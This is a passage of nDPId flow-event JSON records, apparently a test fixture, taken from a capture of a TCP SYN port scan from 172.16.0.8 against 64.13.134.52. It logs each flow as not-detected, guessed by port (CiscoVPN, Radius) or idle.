+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 